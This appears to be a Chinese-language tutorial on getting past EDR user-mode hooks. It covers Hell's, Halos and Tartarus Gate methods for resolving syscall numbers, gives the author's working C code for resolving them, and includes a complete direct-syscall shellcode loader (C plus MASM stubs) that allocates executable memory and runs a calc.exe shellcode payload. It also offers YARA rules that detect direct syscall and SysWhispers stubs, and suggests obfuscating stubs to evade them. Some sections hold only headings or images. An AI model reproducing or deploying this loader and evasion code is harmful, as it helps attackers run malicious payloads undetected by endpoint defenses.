Skip to main content

调用syscall实现用户态Hooking绕过

提取 syscall 号码

Hells Gate

Hells Gate 通过 PEB Walking 的方法得到加载的 ntdll 地址以及想要获得 SSN 的函数地址。通过对关键字节的比较来确定这是一个有效的 syscall stub,从而提取出 SSN。其实上个小节我们已经用了这个逻辑了。

原始代码关键部分如下:

if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw); 
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw); 
					pVxTableEntry->wSystemCall = (high << 8) | low;
					break;
}

但是,如果要搜索的函数被 hook 了,那么 SSN 可能不会存在于 syscall stub 里(取决于是什么 EDR 以及覆盖了哪些指令),这样的话,就不能成功获得 ssn 了。因此,Halos Gate 对此进行了改善。


Halos Gate

我们发现,在 ntdll 里,随着地址的增高,NTAPI 的 SSN 是递增的,反之则递减。因此,如果我们想要搜索的 NTAPI 被 hook 了,可以向上(低地址方向)和向下(高地址方向)同时继续搜索。例如往下搜索了 2 跳发现了一个未被 hook 的 NTAPI,那么要搜索的 NTAPI 的 SSN 就是这个未被 hook 的 NTAPI 的 SSN 再减去 2,即 Desired_SSN = Clean_SSN - Hop;如果是往上搜索到的,则要加上跳数,即 Desired_SSN = Clean_SSN + Hop。

image.png

关键代码部分如下:

int GoUp -32;
int GoDown 32;
// If the first instruction of the syscall is a an inconditional jump (aka it's hooked)
if (*((PBYTE)pFunctionAddress) == 0xe9) {
	// Search beginning pattern of syscall stub through 500 function up and down from our location
	for (WORD index = 1; index <= 500; index++) {
		// Search the begining of a syscall stub in the next function down
		if (*((PBYTE)pFunctionAddress + index * GoDown) == 0x4c
			&& *((PBYTE)pFunctionAddress + 1 + index * GoDown) == 0x8b
			&& *((PBYTE)pFunctionAddress + 2 + index * GoDown) == 0xd1
			&& *((PBYTE)pFunctionAddress + 3 + index * GoDown) == 0xb8
			&& *((PBYTE)pFunctionAddress + 6 + index * GoDown) == 0x00
			&& *((PBYTE)pFunctionAddress + 7 + index * GoDown) == 0x00) {
			BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoDown);
			BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoDown);
			// substract the index from the current syscall identifier to find the one of our target function
			pVxTableEntry->wSystemCall = (high << 8) | low - index;
			return TRUE;
		}
		// Search the begining of a syscall stub in the next function down
		if (*((PBYTE)pFunctionAddress + index * GoUp) == 0x4c
			&& *((PBYTE)pFunctionAddress + 1 + index * GoUp) == 0x8b
			&& *((PBYTE)pFunctionAddress + 2 + index * GoUp) == 0xd1
			&& *((PBYTE)pFunctionAddress + 3 + index * GoUp) == 0xb8
			&& *((PBYTE)pFunctionAddress + 6 + index * GoUp) == 0x00
			&& *((PBYTE)pFunctionAddress + 7 + index * GoUp) == 0x00) {
			BYTE high = *((PBYTE)pFunctionAddress + 5 + index * GoUp);
			BYTE low = *((PBYTE)pFunctionAddress + 4 + index * GoUp);
			// substract the index from the current syscall identifier to find the one of our target function
			pVxTableEntry->wSystemCall = (high << 8) | low + index;
			return TRUE;
		}
}

代码里把每个 syscall stub 的大小按 32 字节计算(即 GoUp / GoDown 的步长),最大搜索跳数为 500,搜索时确实需要注意边界。Halos Gate 也有个小局限性,它以第一条指令是否是 jmp(0xE9)来判断函数是否被 hook 了。我们之前说了,不同的 EDR 覆盖的指令不同,有的 EDR 覆盖的不是第 1 条指令,可以是 syscall 之前的任何指令。例如 CrowdStrike 覆盖的是第 2 条指令。

image.png


Tartarus Gate

Tartarus Gate 相比 Halos Gate 的改动比较小,主要是考虑了更多 EDR 可能 hook 的情况,例如上面截图所示的情况。对前 4 字节逐一对比,还是相对比较可靠的判断。当然了,hook 导致的指令覆盖可能在 syscall 指令之前的任何字节,如果不放心的话,可以增加更多字节比较。

下面的代码是我个人对动态获取 SSN 的实现:

#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#include <stdint.h>
#include <string.h>


// Resolve the base addresses of ntdll and kernel32 without calling any API,
// by following raw offsets from the PEB into the loader's module list.
//
// ntdll    - receives the image base read from the first list entry.
// kernel32 - receives the image base read from the third list entry.
//
// The code assumes the first three entries of the list are ntdll, kernelbase
// and kernel32, in that order, and that the offsets below match the running
// x64 Windows build.
// NOTE(review): 0x30 presumably selects InInitializationOrderModuleList and
// 0x10 the DllBase field relative to that link — confirm against the
// PEB_LDR_DATA / LDR_DATA_TABLE_ENTRY layout.
void GetModule(HMODULE* ntdll, HMODULE* kernel32)
{
	enum
	{
		PEB_LDR_OFFSET     = 0x18,	// PEB->Ldr
		LDR_LIST_OFFSET    = 0x30,	// list head inside the loader data
		ENTRY_BASE_OFFSET  = 0x10	// image base relative to the list link
	};

	PBYTE pebBytes = (PBYTE)__readgsqword(0x60);
	PBYTE ldrBytes = *(PBYTE*)(pebBytes + PEB_LDR_OFFSET);

	// Each list link starts with a pointer to the next link, so a plain
	// dereference advances by one module.
	PBYTE firstLink = *(PBYTE*)(ldrBytes + LDR_LIST_OFFSET);
	*ntdll = *(HMODULE*)(firstLink + ENTRY_BASE_OFFSET);

	PBYTE secondLink = *(PBYTE*)firstLink;
	PBYTE thirdLink = *(PBYTE*)secondLink;
	*kernel32 = *(HMODULE*)(thirdLink + ENTRY_BASE_OFFSET);
}

// Returns nonzero when the four bytes at p are 4C 8B D1 B8, the unmodified
// start of a syscall stub (mov r10, rcx ; mov eax, imm32).
static int QuickGetSSN_IsCleanStub(const BYTE* p)
{
	return p[0] == 0x4C && p[1] == 0x8B && p[2] == 0xD1 && p[3] == 0xB8;
}

// Reads the little-endian 16-bit system service number that follows the B8
// opcode of a clean stub.
static WORD QuickGetSSN_ReadSsn(const BYTE* p)
{
	return (WORD)(p[4] | (p[5] << 8));
}

// Determine the system service number (SSN) of the syscall stub at
// pFunctionAddress.
//
// If the stub still starts with the expected bytes, the SSN is read directly.
// Otherwise the stub is treated as hooked and its neighbours are probed, one
// 0x20-byte stub at a time, up to maxOffset stubs in each direction. SSNs grow
// with the address, so a clean neighbour at a lower address yields
// neighbour + distance and one at a higher address yields neighbour - distance.
//
// Returns the SSN, or (WORD)-1 when no clean stub is found within range.
// The return type is 16 bits wide because the SSN is a 16-bit immediate; the
// previous 8-bit return silently truncated larger numbers.
//
// The caller must guarantee that the probed range
// [pFunctionAddress - 0x20 * 10, pFunctionAddress + 0x20 * 10 + 5] is readable.
WORD QuickGetSSN(PBYTE pFunctionAddress)
{
	const int maxOffset = 10; // You can adjust this based on your requirements.
	const int stubSize = 0x20;

	if (QuickGetSSN_IsCleanStub(pFunctionAddress))
	{
		WORD ssn = QuickGetSSN_ReadSsn(pFunctionAddress);
		printf("The function is clean\n");
		printf("ID of searched function is: 0x%x\n", (unsigned)ssn);
		return ssn;
	}

	printf("The function is hooked\n");
	// Search both upwards and downwards.
	for (int offset = 1; offset <= maxOffset; ++offset)
	{
		// Check upwards (lower address, smaller SSN).
		PBYTE checkAddress = pFunctionAddress - (stubSize * offset);
		if (QuickGetSSN_IsCleanStub(checkAddress))
		{
			WORD neighbour = QuickGetSSN_ReadSsn(checkAddress);
			WORD ssn = (WORD)(neighbour + offset);
			printf("Clean sequence found upwards at offset -0x%x, SSN of the unhooked function is 0x%x\n", offset, (unsigned)neighbour);
			printf("SSN of searched NTAPI is 0x%x\n", (unsigned)ssn);
			return ssn;
		}

		// Check downwards (higher address, larger SSN).
		checkAddress = pFunctionAddress + (stubSize * offset);
		if (QuickGetSSN_IsCleanStub(checkAddress))
		{
			WORD neighbour = QuickGetSSN_ReadSsn(checkAddress);
			// A neighbour whose SSN is smaller than the distance cannot be a
			// valid reference; keep searching instead of wrapping around.
			if (neighbour >= offset)
			{
				WORD ssn = (WORD)(neighbour - offset);
				printf("Clean sequence found downwards at offset 0x%x, SSN of the unhooked function is 0x%x\n", offset, (unsigned)neighbour);
				printf("SSN of searched NTAPI is 0x%x\n", (unsigned)ssn);
				return ssn;
			}
		}
	}

	printf("No clean neighbour found within %d stubs\n", maxOffset);
	return (WORD)-1;
}

unsigned char GetSSNByName(IN HMODULE hModule, const CHAR* funcName)
{
	PBYTE pBase = (PBYTE)hModule;
	unsigned char ssn_low = -1;
	unsigned char ssn_high = -1;
	unsigned char ssn = -1;
	PIMAGE_DOS_HEADER	pImgDosHdr = (PIMAGE_DOS_HEADER)pBase;
	if (pImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE)
		return -1;
	PIMAGE_NT_HEADERS	pImgNtHdrs = (PIMAGE_NT_HEADERS)(pBase + pImgDosHdr->e_lfanew);
	if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
		return -1;

	IMAGE_OPTIONAL_HEADER	ImgOptHdr = pImgNtHdrs->OptionalHeader;
	PIMAGE_EXPORT_DIRECTORY pImgExportDir = (PIMAGE_EXPORT_DIRECTORY)(pBase + ImgOptHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
	PDWORD FunctionNameArray = (PDWORD)(pBase + pImgExportDir->AddressOfNames);
	PDWORD FunctionAddressArray = (PDWORD)(pBase + pImgExportDir->AddressOfFunctions);
	PWORD  FunctionOrdinalArray = (PWORD)(pBase + pImgExportDir->AddressOfNameOrdinals);
	for (DWORD i = 0; i < pImgExportDir->NumberOfFunctions; i++)
	{
		CHAR* pFunctionName = (CHAR*)(pBase + FunctionNameArray[i]);
		PBYTE pFunctionAddress = (PBYTE)(pBase + FunctionAddressArray[FunctionOrdinalArray[i]]);
		if (_stricmp(funcName, pFunctionName) == 0)
		{
			
			if (pFunctionAddress[0] == 0x4C && pFunctionAddress[1] == 0x8B && pFunctionAddress[2] == 0xD1 && pFunctionAddress[3] == 0xB8)
			{
				printf("NTAPI %s may not be hooked\n", funcName);
				ssn_low = *((unsigned char*)(pFunctionAddress + 4));
				ssn_high = *((unsigned char*)(pFunctionAddress + 5));
				ssn = ssn_low * 1 + ssn_high * 16;
				printf("Syscall number of function %s is: 0x%x\n", pFunctionName,ssn);	//0x18
				return ssn;
			}
			else
			{
				printf("NTAPI %s is hooked, check surrounding functions\n", funcName);
				ssn = QuickGetSSN(pFunctionAddress);
				printf("Syscall number of function %s is: 0x%x\n", pFunctionName, ssn);	//0x18
				return ssn;
			}
			return -1;
		}
	}
	return -1;
}

int main()
{
	HMODULE ntdll;
	HMODULE kernel32;
	GetModule(&ntdll, &kernel32);
	printf("ntdll base address: %p\n", ntdll);
	printf("kernel32 base address: %p\n", kernel32);
	unsigned char ssn =GetSSNByName(ntdll, "NtOpenProcess");
	printf("SSN of the NtOpenProcess is 0x%x\n", ssn);
	return 0;
}

我们人为地给 NtOpenProcess,以及其前向 2 个函数、后向 3 个函数都进行了指令覆盖来模拟 hook。最终,程序成功地发现前向第 3 个函数是没有被 hook 的,提取了其 SSN 后加上 3,得到了 NtOpenProcess 的 SSN。

image.png



直接调用 Syscall


直接 syscall

在 C 源代码文件里定义 NtAllocateVirtualMemory 函数以及所需的结构体,而在 asm 文件里用汇编代码实现函数功能,这里我们实现 NtAllocateVirtualMemory 的 syscall stub 即可。 EXTERN_C 宏允许链接器将该函数定义与汇编代码链接起来,需要保持名称相同。这样,我们就能像调用一般函数一样调用定义的汇编函数了。

EXTERN_C NTSTATUS NtAllocateVirtualMemory(
	IN HANDLE ProcessHandle,
	IN OUT PVOID* BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PSIZE_T RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect);
.code
<...SNIP...>

NtAllocateVirtualMemory PROC
    mov r10, rcx
    mov rax, 18h
    syscall
    ret
NtAllocateVirtualMemory ENDP

<...SNIP...>
end

以此类推,我们接着去定义其他所需的函数,例如 NtWriteVirtualMemory,NtCreateThreadEx,NtWaitForSingleObject,NtClose 等。因为这些 NTAPI 大都没有微软官方的文档,因此我们需要借助搜索引擎参考已有项目对其的用法。完成后的代码如下:

DirectSyscall.c 代码

#include <stdio.h>
#include <Windows.h>

// Local declarations of the native structures referenced by the prototypes
// below. They are declared here because this file only includes <stdio.h>
// and <Windows.h>.
// NOTE(review): the layouts presumably mirror the undocumented native
// definitions — confirm against a trusted reference before relying on them.

// One entry of a process/thread attribute list.
typedef struct _PS_ATTRIBUTE
{
	ULONG  Attribute;
	SIZE_T Size;
	// Value and ValuePtr share the same storage.
	union
	{
		ULONG Value;
		PVOID ValuePtr;
	} u1;
	PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

// Wide-character string described by a length, a capacity and a buffer.
// NOTE(review): Length/MaximumLength are presumably byte counts — confirm.
typedef struct _UNICODE_STRING
{
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

// Object attributes; used only as the type of NtCreateThreadEx's optional
// ObjectAttributes parameter, for which main passes NULL.
typedef struct _OBJECT_ATTRIBUTES
{
	ULONG           Length;
	HANDLE          RootDirectory;
	PUNICODE_STRING ObjectName;
	ULONG           Attributes;
	PVOID           SecurityDescriptor;
	PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

// Attribute list header followed by its entries; declared with a single
// element. Used only as the type of NtCreateThreadEx's optional AttributeList
// parameter, for which main passes NULL.
typedef struct _PS_ATTRIBUTE_LIST
{
	SIZE_T       TotalLength;
	PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

// Prototypes for the syscall stubs implemented in stub.asm. EXTERN_C keeps the
// names as written here so the linker can match them to the PROC labels of the
// same name. Each function returns the NTSTATUS left in the return register by
// the system call.

// Called by main to obtain the memory region that receives the payload.
EXTERN_C NTSTATUS NtAllocateVirtualMemory(
	IN HANDLE ProcessHandle,
	IN OUT PVOID* BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PSIZE_T RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect);

// Called by main to copy the payload into the allocated region.
EXTERN_C NTSTATUS NtWriteVirtualMemory(
	IN HANDLE ProcessHandle,
	IN PVOID BaseAddress,
	IN PVOID Buffer,
	IN SIZE_T NumberOfBytesToWrite,
	OUT PSIZE_T NumberOfBytesWritten OPTIONAL);

// Called by main to start a thread at the beginning of the allocated region.
EXTERN_C NTSTATUS NtCreateThreadEx(
	OUT PHANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN HANDLE ProcessHandle,
	IN PVOID StartRoutine,
	IN PVOID Argument OPTIONAL,
	IN ULONG CreateFlags,
	IN SIZE_T ZeroBits,
	IN SIZE_T StackSize,
	IN SIZE_T MaximumStackSize,
	IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);

// Called by main to wait on the thread handle.
EXTERN_C NTSTATUS NtWaitForSingleObject(
	IN HANDLE ObjectHandle,
	IN BOOLEAN Alertable,
	IN PLARGE_INTEGER TimeOut OPTIONAL);

// Called by main to release the thread handle.
EXTERN_C NTSTATUS NtClose(
	IN HANDLE Handle);


// Demo entry point for the direct-syscall stubs: allocates a region, copies
// the test payload into it, runs it on a new thread and waits for it.
//
// Every stub returns an NTSTATUS and does not set the thread's last-error
// value, so failures are reported from the returned status. The function stops
// at the first failing step instead of continuing with a NULL region or an
// unset thread handle.
//
// Returns 0 when all steps succeed, 1 otherwise.
int main() {
    // calc.exe shellcode
    unsigned char code[] = "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2\x48\xff\xc2\x48\x83\xec\x28\xff\xd0";

    // NULL (not the C++-only nullptr) lets the system choose the address.
    LPVOID allocation_start = NULL;
    SIZE_T allocation_size = sizeof(code);
    HANDLE hThread = NULL;
    NTSTATUS status;

    // Allocate Virtual Memory
    status = NtAllocateVirtualMemory(GetCurrentProcess(), &allocation_start, 0, &allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (status != 0) {
        printf("Allocated failed, NTSTATUS is 0x%08lX\n", (unsigned long)status);
        return 1;
    }
    printf("Memory allocated at %p\n", allocation_start);

    // Copy shellcode into allocated memory
    status = NtWriteVirtualMemory(GetCurrentProcess(), allocation_start, code, sizeof(code), NULL);
    if (status != 0) {
        printf("Copied failed, NTSTATUS is 0x%08lX\n", (unsigned long)status);
        return 1;
    }
    printf("Copied successfully\n");

    // Start a thread at the beginning of the region. The integer parameters
    // take 0 rather than NULL/FALSE, which are pointer/boolean constants.
    status = NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, GetCurrentProcess(), allocation_start, NULL, 0, 0, 0, 0, NULL);
    if (status != 0) {
        printf("Executed failed, NTSTATUS is 0x%08lX\n", (unsigned long)status);
        return 1;
    }
    printf("Executed successfully\n");

    // Wait for the end of the thread and close the handle
    NtWaitForSingleObject(hThread, FALSE, NULL);
    NtClose(hThread);

    return 0;
}

stub.asm 代码

; Direct syscall stubs for the functions declared EXTERN_C in DirectSyscall.c.
; Every stub has the same four-instruction shape:
;   1. copy the first argument from rcx to r10 (the syscall instruction
;      overwrites rcx with the return address),
;   2. load the system call number into rax,
;   3. execute syscall,
;   4. return to the caller with the status left in rax.
; NOTE(review): the system call numbers are hard-coded; presumably they are
; only valid for the Windows build the author tested on — confirm per target.
.code

; System call number 18h.
NtAllocateVirtualMemory PROC
    mov r10, rcx
    mov rax, 18h
    syscall
    ret
NtAllocateVirtualMemory ENDP

; System call number 3Ah.
NtWriteVirtualMemory PROC
    mov r10, rcx
    mov rax, 3Ah
    syscall
    ret
NtWriteVirtualMemory ENDP

; System call number 0C2h.
NtCreateThreadEx PROC
    mov r10, rcx
    mov rax, 0C2h
    syscall
    ret
NtCreateThreadEx ENDP

; System call number 4.
NtWaitForSingleObject PROC
    mov r10, rcx
    mov rax, 4
    syscall
    ret
NtWaitForSingleObject ENDP

; System call number 0Fh.
NtClose PROC
    mov r10, rcx
    mov rax, 0Fh
    syscall
    ret
NtClose ENDP


end

为了能编译 masm 文件,我们右键项目,选择 Build Dependencies -> Build Customizations,勾选 masm

image.png

右键 asm 代码文件选择属性,General -> Item Type 选项选择 Microsoft Macro Assembler

image.png

这样我们便能编译项目里的 masm 代码了。编译后运行程序,我们发现 shellcode 得以成功运行。

image.png

不过直接 syscall 调用的弊端也是比较显著的,汇编函数在编译后成为操作码存在于程序的代码区,汇编代码与操作码是可预测的一一对应的关系。因此,如果没有对 syscall stub 进行混淆的话,我们可以用如下 yara 规则来检测包含直接 syscall 调用的程序:

rule direct_syscall
{
    meta:
        description = "Hunt for direct syscall"

    strings:
        // mov r10, rcx ; mov rax, imm32 ; syscall ; ret
        $stub_mov_rax = { 4C 8B D1 48 C7 C0 ?? ?? ?? ?? 0F 05 C3 }
        // mov r10, rcx ; mov eax, imm32 ; syscall ; ret
        $stub_mov_eax = { 4C 8B D1 B8 ?? ?? ?? ?? 0F 05 C3 }

    condition:
        // Fires as soon as either stub form occurs at least once.
        any of them
}

我们定义了 5 个 syscall stub,都被检测到了。我们可以插入一些 NOP 类(即无实际意义、不影响运行结果) 的指令用于混淆 syscall stub。

image.png

此外,从调用栈的视角,是我们程序的某一函数发起了 syscall,而不是 ntdll 空间内的 NTAPI,这是非常可疑的。

image.png

 

syswhisper 1&2


rule syswhisper2
{
    meta:
        description = "Hunt for syswhisper2 generated asm code"

    strings:
        // Stub shape: spill the four register arguments, call the resolver,
        // restore the arguments, then mov r10, rcx ; syscall ; ret.
        // The displacement of the RIP-relative load and the call target both
        // depend on where the stub sits in the image, so both are wildcarded;
        // a fixed displacement only matches one particular binary layout.
        // NOTE(review): the leading 58 byte is kept from the original
        // signature — confirm it belongs to the stub and not to preceding code.
        $s1 = {
            58
            48 89 4C 24 08
            48 89 54 24 10
            4C 89 44 24 18
            4C 89 4C 24 20
            48 83 EC 28
            8B 0D ?? ?? ?? ??
            E8 ?? ?? ?? ??
            48 83 C4 28
            48 8B 4C 24 08
            48 8B 54 24 10
            4C 8B 44 24 18
            4C 8B 4C 24 20
            4C 8B D1
            0F 05
            C3
        }
    condition:
        #s1 >=1
}

 


间接调用 Syscall


间接 syscall 调用




syswhisper 3

rule syswhisper3
{
    meta:
        description = "Hunt for syswhisper3 generated asm code"

    strings:
        // Stub entry: spill the four register arguments, reserve stack space,
        // load a 32-bit immediate into ecx and call the resolver.
        $s1 = {48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 48 83 ec 28 b9 ?? ?? ?? ?? e8}
        // Stub exit: release the stack space, restore the four register
        // arguments and copy rcx to r10 ahead of the system call.
        $s2 = {48 83 c4 28 48 8b 4c 24 08 48 8b 54 24 10 4c 8b 44 24 18 4c 8b 4c 24 20 4c 8b d1}
    condition:
        #s1 >=1 or #s2 >=1
}



MutationGate


image.png

image.png